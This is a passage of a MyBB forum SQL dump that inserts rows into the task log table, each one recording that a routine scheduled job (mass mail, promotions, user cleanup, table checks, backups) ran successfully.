('9009', '5', '1349797808', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9008', '9', '1349797798', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9007', '3', '1349796600', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9006', '9', '1349796359', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9005', '5', '1349796301', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9004', '9', '1349795922', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9003', '5', '1349795915', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9002', '7', '1349795908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9001', '1', '1349795491', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9000', '3', '1349794864', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8999', '9', '1349794549', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8998', '5', '1349794430', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8997', '3', '1349794427', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8996', '9', '1349794237', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8995', '5', '1349793619', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8994', '9', '1349791992', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8993', '7', '1349791809', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8992', '1', '1349791799', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8991', '3', '1349791734', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8990', '9', '1349791733', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8989', '5', '1349791621', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8988', '9', '1349790174', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8987', '3', '1349789426', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8986', '9', '1349789413', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8985', '5', '1349789220', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8984', '9', '1349788383', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8983', '5', '1349787948', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8982', '7', '1349787651', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8981', '1', '1349787618', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8980', '3', '1349787586', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8979', '9', '1349787347', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8978', '5', '1349786704', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8977', '9', '1349786413', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8976', '3', '1349786082', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8975', '9', '1349786076', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8974', '5', '1349786034', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8973', '9', '1349784612', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8972', '5', '1349784329', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8971', '7', '1349784029', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8970', '1', '1349784024', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8969', '3', '1349783951', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8968', '9', '1349783765', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8967', '5', '1349783755', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8966', '9', '1349782916', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8965', '3', '1349782229', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8964', '9', '1349782132', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8963', '5', '1349781920', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8962', '9', '1349781859', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8961', '5', '1349781806', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8960', '7', '1349781786', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8959', '1', '1349781711', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8958', '3', '1349780960', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8957', '9', '1349780950', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8956', '5', '1349779596', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8955', '9', '1349779304', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8954', '3', '1349778833', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8953', '9', '1349778342', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8952', '5', '1349778313', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8951', '9', '1349777640', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8950', '5', '1349777447', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8949', '7', '1349777443', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8948', '1', '1349777415', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8947', '3', '1349777364', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8946', '9', '1349777355', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8945', '5', '1349776151', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8944', '3', '1349775821', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8943', '9', '1349775813', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8942', '5', '1349774988', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8941', '9', '1349774051', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8940', '7', '1349774004', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8939', '1', '1349773997', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8938', '3', '1349773986', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8937', '5', '1349773985', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8936', '9', '1349773653', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8935', '3', '1349771415', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8934', '9', '1349771365', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8933', '5', '1349771358', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8932', '9', '1349770360', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8931', '5', '1349769975', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8930', '7', '1349769639', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8929', '1', '1349769631', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8928', '3', '1349769548', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8927', '9', '1349769369', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8926', '3', '1349768853', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8925', '9', '1349768851', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8924', '5', '1349768833', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8923', '5', '1349767117', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8922', '7', '1349767113', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8921', '1', '1349767109', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8920', '3', '1349767071', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8919', '9', '1349767062', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8918', '5', '1349765103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8917', '9', '1349764901', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8916', '3', '1349764218', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8915', '9', '1349764174', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8914', '5', '1349764189', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8913', '7', '1349764186', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8912', '1', '1349764180', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8911', '3', '1349764177', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8910', '9', '1349761599', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8907', '11', '1349761011', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8908', '4', '1349761130', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('8909', '9', '1349761152', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9145', '9', '1349844918', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9146', '3', '1349845184', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9147', '1', '1349845235', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9148', '7', '1349845330', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9149', '5', '1349845557', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9150', '9', '1349845955', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9151', '5', '1349846709', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9152', '9', '1349846726', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9153', '3', '1349847014', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9154', '9', '1349847702', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9155', '5', '1349847941', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9156', '9', '1349849052', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9157', '3', '1349849190', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9158', '1', '1349849244', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9159', '7', '1349849260', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9160', '5', '1349849660', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9161', '9', '1349854873', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9162', '5', '1349854877', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9163', '3', '1349856597', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9164', '1', '1349856607', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9165', '7', '1349856709', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9166', '5', '1349856717', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9167', '9', '1349856807', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9168', '5', '1349857620', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9169', '9', '1349860254', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9170', '3', '1349860290', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9171', '5', '1349860304', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9172', '1', '1349860326', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9173', '7', '1349860328', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9174', '5', '1349861214', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9175', '9', '1349861225', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9176', '3', '1349862547', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9177', '9', '1349862598', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9178', '5', '1349862599', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9179', '9', '1349863139', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9180', '3', '1349863146', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9181', '1', '1349863211', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9182', '7', '1349863214', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9183', '5', '1349863552', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9184', '9', '1349863922', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9185', '5', '1349865053', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9186', '9', '1349865062', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9187', '3', '1349865066', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9188', '9', '1349866608', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9189', '5', '1349866620', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9190', '3', '1349866940', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9191', '1', '1349866964', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9192', '7', '1349866971', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9193', '5', '1349867328', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9194', '9', '1349867902', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9195', '5', '1349869517', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9196', '9', '1349869579', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9197', '3', '1349869640', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9198', '9', '1349870114', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9199', '3', '1349870343', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9200', '1', '1349870408', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9201', '4', '1349870415', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9202', '7', '1349870422', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9203', '5', '1349870705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9204', '9', '1349871273', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9205', '5', '1349872255', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9206', '9', '1349872286', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9207', '3', '1349872291', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9208', '9', '1349872884', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9209', '5', '1349873111', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9210', '9', '1349873910', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9211', '3', '1349873948', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9212', '1', '1349874498', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9213', '7', '1349874503', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9214', '5', '1349874506', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9215', '9', '1349874741', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9216', '5', '1349875761', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9217', '9', '1349875781', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9218', '3', '1349876023', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9219', '9', '1349876421', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9220', '5', '1349876707', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9221', '9', '1349877327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9222', '3', '1349877563', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9223', '1', '1349877613', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9224', '7', '1349877639', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9225', '5', '1349878059', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9226', '9', '1349878405', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9227', '5', '1349880382', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9228', '9', '1349880406', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9229', '3', '1349880410', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9230', '9', '1349882522', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9231', '3', '1349882526', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9232', '1', '1349882533', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9233', '7', '1349882686', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9234', '5', '1349882698', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9235', '5', '1349882702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9236', '9', '1349882737', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9237', '3', '1349883001', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9238', '9', '1349883766', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9239', '5', '1349884145', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9240', '9', '1349884842', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9241', '3', '1349884855', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9242', '1', '1349884860', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9243', '7', '1349884881', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9244', '5', '1349885320', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9245', '9', '1349885670', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9246', '5', '1349886721', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9247', '9', '1349886761', 'The mass mail task 